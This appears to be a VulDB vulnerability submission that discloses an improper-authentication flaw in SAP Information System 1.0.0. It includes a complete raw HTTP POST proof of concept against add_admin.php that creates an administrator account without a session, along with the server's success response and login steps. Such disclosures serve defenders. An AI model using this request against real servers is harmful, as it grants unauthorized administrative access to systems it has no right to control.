| Title | SAP Information System 1.0.0 - Improper Authentication |
|---|
| Description | Summary:
SAP Information System version 1.0.0 suffers from an improper authentication vulnerability that allows a malicious user to create an administrative account without needing to authenticate. The POST request is sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The problem occurs due to lack of session verification in the request.
Steps to Reproduce:
1. Copy this request and change the host and send it to the server:
############################################
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"
hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"
P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"
admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--
############################################
Reply:
############################################
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2022 16:15:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8
<script type="text/javascript">setTimeout(function () { swal("Add Admin Successfully!","Message!","success");}, 1000);</script><script type="text/javascript">setTimeout(function(){window.location = "/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>
############################################
2. Go to the login page and enter the hacker:P@ssw0rd! credential. After that you will be logged in with an administrative account. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 04/05/2022 23:26 (4 years ago) |
|---|
| Moderation | 04/06/2022 04:56 (5 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 196550 [SAP Information System 1.0 POST Request add_admin.php improper authentication] |
|---|
| Points | 20 |
|---|